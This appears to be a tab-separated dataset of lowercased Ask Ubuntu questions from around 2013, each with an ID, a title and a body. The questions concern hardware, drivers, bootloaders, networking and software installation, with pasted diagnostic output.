316805	use of an external hard drive for backups	i have acquired an used external hd ( a wd passport ) that i 'm planning to use for the backup of important files - i was thinking of using it with dăšjă dup . should i format it beforehand ? which partition type would make sense ? should i go for the `` do n't partition '' option ? all of this is supposed to be done trough the disk utility , right ? sorry if the questions seems somewhat silly - i 'm definitely not very savvy regarding these matters . thank you very much . done as suggested , formatting the whole thing as ext4 . a separate 700 mb partition with stuff from the hd producer ( instructions , an automated backup program for windows etc ... ) seems to have survived . should i go after it or leave it be ? the disk is pretty big and i backup mostly texts , so i 'm not really craving for more space . another question : would the ext4 interfere with the recovering of the data in the hd by using a non-unix system ? how much of a hassle would that be ? thanks again !
316811	ca n't use nvidia geforce 310m in ubuntu 13.04	okay so before anybody marks this as a possible duplicate or something along those lines let me say what ive worked on ; i have used bumblebee , manually installed the drivers myself , tried a bunch of old drivers and new ones in hopes of something happening , re-installed drivers and bumblebee and done a re-installation of the os and nothing ... im dualbooting ubuntu 13.04 next to windows 7 ( both are 64-bit ) and the problem is that i cant seem to get my gpu running and i found that ubuntu cant acces the gpu for some reason ( this showed up while working with bumblebee in a terminal ) ... i have intel hd graphics ( built in ) and an nvidia geforce 310m ( 512mb ) these are my specs ; cpu ; intel core i5 ram ; 4gb ( 3.7 to be exact ) hdd ; 500gb ( divided equaly in half for both operating systems ) gpu ; nvidia geforce 310m 512mb ( as mentioned ) computer/laptop ; toshiba satellite e205 : ) help is apretiated
316814	install mobile partner in ubuntu 13.04 without download	i have huwawei e303 hspa dongal and it has already provided software for linux.but i cant install it . this is dongal https : //lh3.googleusercontent.com/-fidfg85yv1m/udciqwwtdni/aaaaaaaaax0/q7obegg4hkq/s588-no/screenshot+from+2013-07-06+01 % 253a06 % 253a08.png i have very few knowledge about ubuntu.i tried in terminal as fallowing . root @ nandika-oem : ~ # su root @ nandika-oem : /home/nandika # root @ nandika-oem : /home/nandika # /media/nandika/mobitel/linux/install bash : /media/nandika/mobitel/linux/install : permission denied root @ nandika-oem : /home/nandika # dash /media/nandika/mobitel/linux/install /media/nandika/mobitel/linux/install : 43 : /media/nandika/mobitel/linux/install : languagestring [ 0 ] =zh : not found /media/nandika/mobitel/linux/install : 44 : /media/nandika/mobitel/linux/install : languagestring [ 1 ] =en_us : not found /media/nandika/mobitel/linux/install : 45 : /media/nandika/mobitel/linux/install : languagecode [ 0 ] =0 : not found /media/nandika/mobitel/linux/install : 46 : /media/nandika/mobitel/linux/install : languagecode [ 1 ] =1 : not found /media/nandika/mobitel/linux/install : 49 : /media/nandika/mobitel/linux/install : bad substitution root @ nandika-oem : /home/nandika # help to install.i cant get call , sms without this . but i can connect internet .
316816	how to remove this title bar off window from gnome-shell ?	how can i remove this title-bar ubuntu start page - mozilla firefox like thing off browser/window from gnome-shell ?
316817	printing from ubuntu to windows printer	i have a windows vista machine downstairs with 2 printers hooked up to it ( it 's currently not possible to connect them to my ubuntu machine ) . i have printer sharing enabled as well as discovery enabled on the vista machine , and i 'm able to find/print from other windows machines in my house with no issue . i ca n't do that with my ubuntu machine though , and i have not seen any guides online on how to do so , it 's usually a ubuntu 'printer server ' in all the cases . i 've tried finding the printers with the printer settings by both samba and the ip address assigned by my router to the vista machine . so i 'm just going to ask for a direction in how to go about doing this .
316818	internet connection work sometimes , does n't others	i 'm running ubuntu 13.04 on an acer aspire 5349 with intel sandybridge and 6gb ram ( not that it pertains to this issue ) . i ca n't , for the life of me , get this thing to hold a stable connection for more than a few minutes , via wifi or through ethernet cable . even sitting right next to the router , even plugged right into it , the connection will be flawless at first , then after loading a few pages , it 'll just stop and chrome says `` sending request ... '' and then the page eventually says it ca n't be loaded . i just do n't understand how it can work perfectly fine - and fast , too - but then not work the next . any help is appreciated !
316819	canon ( mg 5350 ) scangear does n't appear in dash	i recently downloaded the ubuntu scangear driver from their website for my canon pixma mg5350 3 in one printer . i downloaded the debian package and installed it trough the terminal , however i ca n't seem to find the app himself . i searched for it trough dash and other scanning apps did n't work from the beginning ( like xsane and simple scan ) , since they do n't seem to recognize my printer/scanner . the terminal seemed to install the driver/program just fine ; it did n't encounter any errors . how can i fix this ?
316824	very high iowait + extremely slow hdparm -tt	i have been running 12.04 on my fujitsu siemens lifebook e751 for almost a year without any problems , and then several days ago i noticed a very high cpu iowait that makes the system poorly responsive ( it freezes for fractions of a second , but this happens very often making the computer very unpleasant to use ) . i tried to debug and iotop identifies jbd2 ( journaling block device ) as the process responsible . this process is only called while i do regular activities and not when the computer is idle . it did not seem that the problem is that it is called too often , but that when it is called , it takes too much time to do its job . so i have tried to check my disk and was unpleasantly surprised by its extremely slow performance parameters . sudo hdparm -tt /dev/sdb6 /dev/sdb6 : timing cached reads : 2 mb in 2.43 seconds = 842.41 kb/sec timing buffered disk reads : 22 mb in 3.01 seconds = 7.30 mb/sec i did a fresh install of 13.04 ( i had all my data backed up so it was not so radical ) and that did not fix anything . i also checked the disk performance while booted from usb and the disk performance is the same ( the system booted from usb is very responsive so i assume that this can not be cpu or memory problem ) . could this be fixed ( is this a software or a hardware failure ) ? thank you for your advices . filip ps : here is some more data that might be useful . sync ; time sh -c `` dd if=/dev/zero of=testfile bs=100k count=1k & & sync '' ; rm testfile 1024+0 records in 1024+0 records out 104857600 bytes ( 105 mb ) copied , 0,0837853 s , 1,3 gb/s real 0m1.250s user 0m0.000s sys 0m0.100s sudo hdparm /dev/sdb6 /dev/sdb6 : multcount = 16 ( on ) io_support = 1 ( 32-bit ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 60801/255/63 , sectors = 731281408 , start = 198688768 sudo hdparm -i /dev/sdb6 /dev/sdb6 : model=toshiba mk5061gsyn , fwrev=mh000k , serialno=629gf6jis config= { fixed } rawchs=16383/16/63 , trksize=0 , sectsize=0 , eccbytes=0 bufftype=unknown , buffsize=16384kb , maxmultsect=16 , multsect=16 curchs=65535/1/63 , cursects=4128705 , lba=yes , lbasects=976773168 iordy=on/off , tpio= { min:120 , w/iordy:120 } , tdma= { min:120 , rec:120 } pio modes : pio0 pio1 pio2 pio3 pio4 dma modes : sdma0 sdma1 sdma2 mdma0 mdma1 mdma2 udma modes : udma0 udma1 udma2 udma3 udma4 *udma5 advancedpm=yes : unknown setting writecache=enabled drive conforms to : unspecified : ata/atapi-3,4,5,6,7 * signifies the current active mode sudo smartctl -a /dev/sdb6 smartctl 5.43 2012-06-30 r3573 [ x86_64-linux-3.8.0-23-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : toshiba 2.5 '' hdd mk..61gsyn device model : toshiba mk5061gsyn serial number : 629gf6jis lu wwn device id : 5 000039 416f03c89 firmware version : mh000k user capacity : 500,107,862,016 bytes [ 500 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : fri jul 5 22:01:13 2013 cest smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 25 ) the self-test routine was aborted by the host . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 126 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0005 100 100 050 pre-fail offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 2356 4 start_stop_count 0x0032 100 100 000 old_age always - 1413 5 reallocated_sector_ct 0x0033 100 100 050 pre-fail always - 0 7 seek_error_rate 0x000b 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 093 093 000 old_age always - 3160 10 spin_retry_count 0x0033 128 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 1149 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 26 192 power-off_retract_count 0x0032 100 100 000 old_age always - 7 193 load_cycle_count 0x0032 098 098 000 old_age always - 22993 194 temperature_celsius 0x0022 100 100 000 old_age always - 59 ( min/max 18/61 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 0 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 8364 222 loaded_hours 0x0032 094 094 000 old_age always - 2550 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 266 240 head_flying_hours 0x0001 100 100 001 pre-fail offline - 0 smart error log version : 1 ata error count : 1 cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 1 occurred at disk power-on lifetime : 310 hours ( 12 days + 22 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 84 41 30 ff ff 25 65 error : icrc , abrt at lba = 0x0525ffff = 86376447 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 00 40 00 01 26 40 00 05:26:41.826 write fpdma queued 61 00 38 00 00 26 40 00 05:26:41.826 write fpdma queued 61 00 30 00 ff 25 40 00 05:26:41.826 write fpdma queued 61 00 28 00 fe 25 40 00 05:26:41.826 write fpdma queued 61 00 20 00 fd 25 40 00 05:26:41.823 write fpdma queued smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline aborted by host 90 % 3155 - # 2 short offline completed without error 00 % 3155 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
316831	fan turns on full blast after resuming from suspend - sony vaio w/ ubuntu 12.04	os : ubuntu 12.04 laptop : sony e-series sve14a37cdh . graphics : amd radeon hd 7600m series hybrid gpu . i installed the proprietary amd catalyst drivers from : http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx i followed this tutorial : what is the correct way to install ati catalyst video drivers ( fglrx ) ? when i switch to the integrated intel gpu ( using the catalyst control center ) it works fine until i suspend and resume . at this point the fan powers up full speed and does not stop . the cpu load is very low and laptop is cool . this only happens while using the intel gpu , and does not happen when radeon gpu is enabled . any ideas would be greatly appreciated ! edit : i just did a fresh install , turned off discrete gpu with vgaswitcheroo using only the default drivers ( no fglrx installed at any point ) and the problem still happens . when the computer returns form suspend , the fan revs up and does n't stop .
316832	when is the ubuntu os for mobiles released ?	when are you going to release ubuntu phone version ? my phone ( nokia n9 ) os is linux ( meego harmaten ) , could i install ubuntu for phones on my mobile ?
316833	lightweight gnome-keyring alternative	i 'm thinking of ditching the gnome desktop for something more lightweight ( might even go crunchbang instead ) . i do however like the gnome-keyring . it can be integrated to other software ( i.e . offlineimap ) . i know that the gnome keyring are being deprecated for libsecret but i do believe that it is also tied to the gnome desktop ? are there any lightweight `` key ring '' alternative that would work with for example crunchbag ?
316834	moving thunderbird from windows seven to ubuntu 12.04	i am trying to move my thunderbird profile from windows 7 to ubuntu 12.04 . the simplest explanation of how to do this that i have found so far is at http : //www.seoras.com/2008/05/28/how-to-transfer-thunderbird-profile-from-windows-to-ubuntu-804/ i have followed this procedure carefully without difficulty but it does not seem to work . thunderbird opens fine but has no information in it , no emails , or accounts . it opens just like it did before the profile change . any help or suggestions would be much appreciated .
316841	how to remove mbr and replace grub ?	about 2 weeks ago on friday , so exactly 2 weeks ago , i accidentally screwed up grub on ubuntu 13.04 ( 64-bit ) . i do n't remember how , but i did . i tried fixing it on my own . tried several boot repair disks , and could n't figure it out . then one day , i decided to try to install mbr on one of my repair disks . sadly , that kept me from even reaching the boot screen . now i ca n't remove that . the only way i can boot linux mint and ubuntu now is through super grub repair or something . it 's in the rescatux thing ... .. anyway , there is an option that allows you to look for operating systems on the computer . it finds both ubuntu and linux , but only linux is bootable because grub is fine . but ubuntu , grub is messed up and its the primary operating system . i had booting from a disk every time and i 'd like to get it fixed . i have to go out of state sunday , but i only have internet until saturday . i 'd also like to add that i 'm willing to risk losing data if i must reinstall ubuntu . i noticed in the installer that i can reinstall , but it insists that i backup before doing so , but i ca n't even access /home/user/ so.. i mean , i can look into user , but i ca n't actually see desktop , downloads , documents , etc . i can only see access-your-private-data.desktop and readme.txt . thank you .
316842	how do i set the prompt to use two colors ?	however , one thing i liked about mint was that the terminal would usually show two colors : everything from the left to the $ would be one color ( green , i think ) , and every then past the $ would be another . is there a way to make this so with ubuntu ?
316846	nvidia geforce 680 gtx - glitches on screen	i have an nvidia geforce 680 gtx and installed the prob . driver ubuntu showed me ! [ screenshot1 ] . i have the problem that if e. g. i have to scroll down a large document i get glitches . i looks like some lines are overlaying or rendered to late . it 's kinda hard for me to describe it since i do n't know how to explain it in english ; - ) maybe it 's just a setting in the nvidia xserver ? the screen is connected via hdmi . could ths be the problem . the problem exists in unity and gnom3 . here is some more information about the system : ubuntu 12.04 lts ( 64 bit ) memory 16 gb intel core i7-3770k cpu @ 3.50ghz x 8 graphic geforce gtx 680/pcie/sse2 i really would appreciate if someone could help me . this is quite annoying . if you need any further information i will try to provide them . thanks in advance ! mark
316848	i can only connect to https pages , not plain http	my problem is that i can not connect to simple http web pages , only to https secured pages . any idea why this would be ? i do n't have any proxies . i tested the connection with windows 7 and it works fine . it 's a problem i have with ubuntu 12.04 , with firefox , chrome , midori . i check the ufw status : it is off . i performed the test with the curl command , and this is what came out without sudo : alumno @ usuario : /usr/bin $ curl -i http : //www.facebook.com curl : ( 7 ) failed to connect to 2a03:2880:2110:3f07 : face : b00c:0:1 : la red es inaccesible alumno @ usuario : /usr/bin $ curl -i https : //www.facebook.com http/1.1 302 found location : http : //www.facebook.com/unsupportedbrowser p3p : cp= '' facebook does not have a p3p policy . learn why here : http : //fb.me/p3p '' x-content-type-options : nosniff set-cookie : datr=firauzvp3gavo3pe5lxnepdq ; expires=wed , 08-jul-2015 02:55:18 gmt ; path=/ ; domain=.facebook.com ; httponly content-type : text/html ; charset=utf-8 x-fb-debug : lublwh6leqcwu4gkqs+yen4/h0eyokinldsp+avye1o= date : mon , 08 jul 2013 02:55:18 gmt connection : keep-alive content-length : 0 then , logging as root , i realized that i could access both http and https ... therefore , i think it must be a setting as root that does not allow me as user to navigate plain http . alumno @ usuario : /usr/bin $ sudo curl -i http : //www.facebook.com http/1.1 302 found location : http : //www.facebook.com/unsupportedbrowser content-type : text/html ; charset=utf-8 x-fb-debug : sccejrzgdiwqrht7qfau2ktw22ykgunwaosuzh4paik= date : mon , 08 jul 2013 02:56:19 gmt connection : keep-alive content-length : 0 alumno @ usuario : /usr/bin $ sudo curl -i https : //www.facebook.com http/1.1 302 found location : http : //www.facebook.com/unsupportedbrowser p3p : cp= '' facebook does not have a p3p policy . learn why here : http : //fb.me/p3p '' x-content-type-options : nosniff set-cookie : datr=xsrauwafbxw77lq6vxr6utii ; expires=wed , 08-jul-2015 02:56:29 gmt ; path=/ ; domain=.facebook.com ; httponly content-type : text/html ; charset=utf-8 x-fb-debug : upnmrozohqj/wgg1mb02zzi5au6hlg2emjlp+vcnd6y= date : mon , 08 jul 2013 02:56:29 gmt connection : keep-alive content-length : 0 how can i fix this situation and let users navigate using plain http ? thanks for your answers and corrections , and sorry for my delay in answering ( translation notes : `` la red es inaccesible '' = `` network is unreachable '' ) after disabling ipv6 and reboot , curl results remain the same . alumno @ usuario : /usr/bin $ sudo sysctl -p [ sudo ] password for alumno : net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 alumno @ usuario : /usr/bin $ curl -i http : //www.facebook.com curl : ( 7 ) failed to connect to 2a03:2880:2110 : cf07 : face : b00c:0:1 : la red es inaccesible alumno @ usuario : /usr/bin $ curl -i https : //www.facebook.com http/1.1 302 found location : http : //www.facebook.com/unsupportedbrowser p3p : cp= '' facebook does not have a p3p policy . learn why here : http : //fb.me/p3p '' x-content-type-options : nosniff set-cookie : datr=oqlauayizdlz-h8tfxrv_4yf ; expires=wed , 08-jul-2015 11:27:54 gmt ; path=/ ; domain=.facebook.com ; httponly content-type : text/html ; charset=utf-8 x-fb-debug : 0sazyjncyia1asfhylekiqaji2eeffybvxpltd0w/xu= date : mon , 08 jul 2013 11:27:54 gmt connection : keep-alive content-length : 0
316850	how do i start terminal in desktop	so in terminal i created a new profile and i wanted it to start up to the desktop directory so i can just enter the filename i wanted to run instead of typing cd desktop . so this is what i did : edit - > profile preferences - > title and command > run a custom command instead of my shell and i put in the custom command this cd desktop . i thought if i put that then when i start the profile it will start as john @ john : ~/desktop $ instead of john @ john : ~ $ but when i start it i get this : there was an error creating the child process for this terminal profile preferences failed to execute child process `` cd '' ( no such file or directory ) relaunch do you know how i can fix this ?
316851	missing python dependencies when installing phablet-tools for ubuntu touch preview	i 'm on ubuntu 13.04 and i run into similar situation and do n't know how to resolve the dependencies issues . anyone can help ? mk @ ms7549 : ~ $ sudo apt-get install phablet-tools [ sudo ] password for mk : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phablet-tools : depends : python-configobj but it is not installable depends : python-launchpadlib but it is not installable depends : python-requests but it is not installable e : unable to correct problems , you have held broken packages . then i tried to install those 3 python packages but they are not available . what do i need to do now ? mk @ ms7549 : ~ $ sudo apt-get install python-configobj reading package lists ... done building dependency tree reading state information ... done package python-configobj is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'python-configobj ' has no installation candidate mk @ ms7549 : ~ $ sudo apt-get install python-launchpadlib reading package lists ... done building dependency tree reading state information ... done package python-launchpadlib is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'python-launchpadlib ' has no installation candidate mk @ ms7549 : ~ $ sudo apt-get install python-requests reading package lists ... done building dependency tree reading state information ... done package python-requests is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'python-requests ' has no installation candidate
316854	having trouble installing ubuntu 13.04 on lenovo y500	i 'm trying to dual boot ubuntu on my new lenovo y500 with windows 8 . using an external hard drive i downloaded the 64 bit version of ubuntu 13.04 , and used the recommended tool to put ubuntu on to the hard drive ( http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ ) . i restarted my computer and everything seemed to work fine . i set up ubuntu and installed in on my main hard drive . i ran into the issue when i had to restart my computer to finish the installation . i restarted it , and when it was starting up there were two different options for ubuntu , the only difference being that one began with an upper case u . apparently i picked the wrong option because it booted into windows 8 . i tried restarting again but it wanted me to go through the whole installation process again . i decided it should n't be too difficult , so i did . this time it ran into an error about failing to install something relating to grub ( which was a fatal error ) . after that i tried to reinstall it once more ( again having an error with grub ) before i erased the data on my external hard drive and deleted the partition that i had already created for ubuntu . i formatted the hard drive and tried to start completely over without any installation of ubuntu on my computer . at that point my computer stopped recognizing ubuntu on my hard drive all together . i turned off secure boot and turned on boot from usb . after changing the settings in bios i tried once more to boot from the usb ( after putting ubuntu back on to the external hard drive ) . this time in the boot menu the external hard drive was listed as an option but when i chose it it told me there was no bootable operating system on it ( which i know there was ) . i 'm sorry for asking such a long question , and i hope it 's clear . any help resolving the situation and getting ubuntu working would be really appreciated !
316856	toshiba satellite l300 xubuntu 12.04 : no brightness control	since my new xubuntu installation ( after the previous lts ) i lost control over the brightness - there used to be a brightness adjustment applet on the top panel , and now it 's gone . i tried to restore fn keys functionality , or changing the grub , but none of the fn key wont work on toshiba satellite l735 ? grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux_default= '' quiet splash acpi_osi=linux '' grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' worked for me ( i did remember to do sudo update-grub before rebooting ) the fnfx client also did not change anything , when i try to run it fnfx it gives me an error : fnfx client v0.3 ( c ) 2003 , 2004 timo hoenig < thoenig @ nouse.net > fatal error : could not open `` /home/chris/.fnfxrc '' . please make sure that the default config is accessible . this command sudo setpci -s 00:02.0 f4.b=x does not work for me neither . i can not follow this fn keys for brightness not working on toshiba satellite l755 suggestion to edit bios settings ( which are not defined in that post ) - does anyone know which settings could be changed in bios , and how ? i run out of possibilities . any other suggestions that could perhaps enable me to control the brightness of my display ? pointing me in a good direction would be really helpful . thank you so much , chris
316857	programmatically present windows ( invoke window picker ) in compiz	is there a bash command to invoke what super+w does in ubuntu ?
316858	java ca n't find libjli.so despite ld.so.conf entry	i 'm trying to get java to run under apparmor on 12.04 by copying the executable to /sandbox/java . ( symlinking is not an option because apparmor fails on symlinks . ) currently , it wo n't run because it ca n't find the libjli.so file . running ldd gives the following : ldd /sandbox/java linux-vdso.so.1 = > ( 0x00007fffef1ff000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f5f725d4000 ) libjli.so = > not found libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f5f723cf000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f5f72010000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f5f727fc000 ) i 've run ldconfig after editing /etc/ld.so.conf to include the following : /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/ /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/native_threads/ /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/server/ ( i 've also tried adding the file path directly , but it does n't help . ) how can i get java to find the libjli.so library ?
316861	why does the a new user account not see the jre ?	probably a dumb question as i 'm new to linux but i 've installed oracle jre using my admin account . i 've then put the minecraft.jar folder in the home dir and all works fine . now i would like my kids to access this through another non-admin account . but when i create the new account it ca n't see either ... . what am i doing wrong please ?
316862	is it possible to have two g++ executables with shared lib ?	it might sound weird but i do want to have two g++ executables . one in normal /usr/bin/g++ which is currently working well . the other under /sandbox/g++ that is protected by apparmor . however when i copied g++ ( not symlink , the original executable g++-4.6 ) to /sandbox/g++ , it ca n't execute with following error : g++-4.6 : error trying to exec 'cc1plus ' : execvp : no such file or directory how can i set it to use the same path/lib as the normal g++ ? i searched online the common answer for above error is to reinstall g++ but my g++ is working well , i just want this one to work at the same time . thanks for any suggestions ! edit : after adding a few path rules in bashrc , cc1plus is found but all the including files path are messed up . i guess i 'll follow the suggestion of building source files locally and see how to configure it .
316863	custom keyboard layout not faithful	i 've created a custom layout by creating a layout in /usr/share/x11/xkb/symbols/chn . i also added the xml information to /usr/share/x11/xkb/rules/evdev.xml . i can choose the layout using the layout setting menus , but if i preview the keyboard layout , it just shows a standard us english layout , and as soon as i try to add the layout i get the following error message : error activating xkb configuration . there can be various reasons for that . if you report this situation as a bug , include the results of • xprop -root | grep xkb • gsettings get org.gnome.libgnomekbd.keyboard model • gsettings get org.gnome.libgnomekbd.keyboard layouts • gsettings get org.gnome.libgnomekbd.keyboard options as far as i can tell , everything in my entries in the layout file and evdev.xml is correct . why does xkb not understand the custom map ? is there some new configuration policy for ubuntu 13.04 ? this is unlike any other custom keyboard question i 've seen in that all the configuration seems to have work , but i can not select the custom layout for use , and it seems not to detect the modifications to the layout .
316867	dropped my dell dual boot vista /ubuntu 12.04 vista will not boot , only ubuntu	i was looking to purchase a new computer lenovo essential g780 laptop - 59381095 - dark brown : doorbuster http : //shop.lenovo.com/us/en/laptops/essential/g-series/g780/ i have started to do video editing with oneshot and love all the speed in ubuntu it is where i try to do everything but i still do a lot of ms access programming so i really need a dual boot . there are no certified 17 '' models that i could find and when program the extra screen width is very helpful . i would greatly appreciate it if anyone could assist me in determining if this g780 will be able to dual boot . i do not know much about hardware compatibility thank you ubuntu community i suggest and promote ubuntu whenever and where ever i can
316869	12.04 lts , tried making bootable usb stick , startup disk creator erased my backup drive !	i used startup disk creator to try and make a bootable usb ubuntu stick to install on my new ultrabook . i had my 2tb backup usb drive attached , as i had just backed up everything on the flash drive . i ran the startup disk creator ( as detailed here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu ) . i selected the appropriate iso ( which was surprisingly also pre-selected ) , and i checked the `` device to use '' and confirmed that it was the correct drive ( by name ) . i clicked `` erase '' to clean the drive . a few minutes went by , and i saw activity on my usb drive . i thought perhaps it was formatting instead of erasing . then i noticed that my backup drive activity was churning ... not a good sign . worst possible thing was true , the startup disc creator was erasing my 2tb backup drive . i have been googling to see what to do , and what exactly `` erase '' does in startup disk creator . i am currently running testdisk and doing a deep scan , as the quick scan did not show a partition with files . what did i do wrong with the startup disk creator ? how could it erase a disc that was n't selected in the `` devices '' dropdown ? what exactly did it do when it erased , and is my data completely hosed or can i expect this long deep scan to bear fruit ?
316875	boot manager is missing , ubuntu 12.04	i did a clean installation of ubuntu 12.04 from a usb stick . after installation , first boot was normal so i logged in installed some apps and lenses and downloaded updates . when i rebooted to install updates after bios screen it said boot manager is missing , press alt+ctrl+del to restart . so how can i repair/install mbr ? thanx
316876	can not get unity to work - help !	i bought an older , refurbished dell latitude d600 - pentium m / 1 gb ram / 100 gb hdd with no os - it is a non-pae so i installed lubuntu 10.04 . i did the update manager and now it shows i have the following : distribution : ubuntu 12.04.02 lts kernel : linux 3.2.0-49-generic ( i686 ) desktop environment : lxde ( lubuntu ) i really want to use unity , but i can not figure out how to get it working . my desktop still shows the same type of lubuntu interface before my update . i know unity is installed as i saw it in the synaptic package manager under installed packages . how do i get unity to operate so i have the cool desktop interface ? please help anyone as i have tried everything ( with my limited computer knowledge ! )
316877	how to make it to start up like this 'john @ john : ~/desktop $ blah blah blah	when i start the terminal i want it to start up like this john @ john : ~/desktop $ blah blah blah without executing the command so i tried to do this sh -c `` cd ~/desktop ; blah blah blah ; exec bash '' but it executed the command .
316878	can i overclock my cpu using cpupowerd ?	i 've been trying to look for ways to overclock my rather old cpu , amd turion 64 x2 tl-56 1.8ghz dual core . my acer aspire 5100 series bios does not give me the option to overclock . after referring to this question and this thread i found using google , i came to the conclusion the only utility that supports amd 's k8 processor family was cpupowerd . i downloaded the code here , compiled it with make & & sudo make install loaded the msr kernel module with sudo modprobe msr and ran it with sudo ./cpupowerd -- freq `` 0|1900 '' which returned the following message : cpupowerd 0.2.1 written by markus strobl . warning : this program could cause damage to your hardware ! frequency 1900 mhz not available ! i then did sudo ./cpupowerd -s which returned cpupowerd 0.2.1 written by markus strobl . warning : this program could cause damage to your hardware ! vendor : amd family : k8 model : 4 mastercpuid : 0 affected cpuids : 0 1 current voltage ( vid ) : 1.1000 v ( 18 ) current frequency ( fid ) : 1800 mhz ( 10 ) supported frequencies : 800 1600 1800 mhz it does n't want to set the frequency to something other that what 's on the supported frequencies list . is there any way for more to override it or alter it ? alternatively , is there another utility i could use to overclock my cpu on ubuntu ? i am able to use cpupowerd as is to set the frequency to 800mhz and 1.6ghz .
316881	changing sleep timer in ubuntu 12.10	i am running ubuntu 12.10 . how can i change my system to suspend time for more than 5 minuets when inactive to a longer amount of time ?
316885	recovering windows partition	how can i recover my windows partition after installing ubuntu 12.04 on the last partition of my hdd . i desperately need to recover all the information on my windows xp home partition for schoolwork purposes . when booting i can see the windows xp partition , but can not access it . all i can do is boot into ubuntu .
316890	possible to download packaged deb file before final publishing on myapps portal ?	first of all sorry if this is a stupid question ( or the wrong place to ask said stupid question ! ) , but i 've looked all over for an answer and could n't find one . i 've recently submitted my game through ubuntu 's myapps portal . they kindly packaged it all up , approved it , and it 's now down to me to click the publish button . before i do that though , i 'd really like to download their packaged up deb file and test it myself . it 's not that i doubt ubuntu 's qa , it 's just i know exactly how it should look and behave , and just want to double check everythings ok before publishing . unfortunately though i 've clicked all over the myapps portal and can not find any place to download it . in the technical details it says it 's in a private ppa on launchpad , but when i logged into the launchpad site with my myapps portal login details , it did n't seem to be there either . will it show up there to download after i publish it ? can anyone shed any light on this ? or point me to a more appropriate place to ask the question ? any help would be appreciated . thanks !
